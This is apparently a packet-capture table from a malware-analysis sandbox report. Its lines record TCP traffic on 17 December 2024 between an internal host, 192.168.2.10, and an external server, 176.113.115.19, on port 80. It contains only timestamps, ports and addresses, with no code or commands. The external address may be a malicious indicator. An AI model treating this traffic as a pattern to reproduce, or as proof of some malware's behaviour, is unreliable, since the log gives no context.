                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.610399961 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.610441923 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.612808943 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.612880945 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.612885952 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.612926006 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.615278006 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.615330935 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.615369081 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.615410089 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.617764950 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.617830992 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.617860079 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.617902994 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.620311022 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.620362043 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.620445013 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.620488882 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.622750044 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.622802973 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.622874022 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.622925997 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.625257969 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.625287056 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.625315905 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.625349045 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.627732992 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.627779007 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.627839088 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.627882957 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.630254030 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.630301952 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.630335093 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.630402088 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.632740974 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.632801056 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.632821083 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.632929087 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.635214090 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.635288954 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.635318041 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.635371923 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.637748957 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.637799025 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.637830019 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.637876034 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.639668941 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.639722109 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.639741898 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.639790058 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.642697096 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.642759085 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.642796993 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.642847061 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.644341946 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.644412041 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.644440889 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.644457102 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.645498037 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.645510912 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.645586967 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.647056103 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.647099018 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.647105932 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.647145033 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.648919106 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.648971081 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.649019003 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.649065018 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.650825977 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.650883913 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.650949001 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.651012897 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.652668953 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.652713060 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.652805090 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.652844906 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.654546976 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.654594898 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.654603958 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.654644966 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.656363010 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.656407118 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.656454086 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.656497955 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.658262968 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.658314943 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.658368111 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.658411980 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.660103083 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.660151005 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.660212040 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.660257101 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.662395954 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.662467003 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.662472010 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.662548065 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.663836956 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.663878918 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.663912058 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.663952112 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.665755033 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.665805101 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.665859938 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.665908098 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.667566061 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.667619944 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.667654037 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.667697906 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.669466972 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.669575930 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.669610023 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.669626951 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.671302080 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.671351910 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.671508074 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.671549082 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.673152924 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.673198938 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.673222065 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.673266888 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.776583910 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.776599884 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.776669025 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.776698112 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.776925087 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.776973963 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.777014971 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.777055979 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.778640032 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.778652906 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.778701067 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.779712915 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.779766083 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.779769897 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.779823065 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.781295061 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.781341076 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.781408072 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.781446934 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.782857895 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.782906055 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.782969952 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.783005953 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.784470081 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.784537077 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.784697056 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.784745932 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.785945892 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.785995960 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.786097050 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.786138058 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.787467957 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.787518978 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.787709951 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.787750959 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.788929939 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.788994074 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.789000988 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.789042950 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.790395021 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.790438890 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.790473938 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.790518999 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.791879892 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.791940928 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.792016983 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.792063951 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.793239117 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.793287039 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.793344975 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.793389082 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.794728994 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.794787884 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.794914007 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.794958115 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.796128988 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.796179056 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.796216011 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.796257973 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.797415972 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.797475100 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.797511101 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.797574997 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.798847914 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.798896074 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.798949003 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.798993111 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.800249100 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.800302029 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.800403118 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.800448895 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.801615953 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.801673889 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.801762104 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.801809072 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.802923918 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.802975893 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.803025961 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.803066015 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.804322004 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.804383993 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.804415941 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.804460049 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.805706978 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.805769920 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.805866957 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.805907965 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.807085037 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.807153940 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.807171106 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.807214975 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.808507919 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.808607101 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.808634996 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.808646917 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.809803963 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.809860945 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.809906006 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.809948921 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.811223030 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.811284065 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.811330080 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.811369896 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.812570095 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.812622070 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.812664032 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.812753916 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.813918114 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.813966990 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.814053059 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.814105034 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.815304041 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.815355062 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.815355062 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.815399885 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.816665888 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.816716909 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.816767931 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.816807985 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.818106890 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.818283081 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.818321943 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.818336964 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.821244955 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.821301937 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.821326971 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.821343899 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.821368933 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.821384907 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.821389914 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.821429968 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.822274923 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.822324991 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.822444916 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.822491884 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.823549986 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.823586941 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.823594093 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.823621035 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.824918985 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.824973106 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.825047970 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.825103998 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.826289892 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.826344013 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.826390982 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.826432943 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.827831984 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.827836990 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.827912092 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.827912092 CET4971580192.168.2.10176.113.115.19
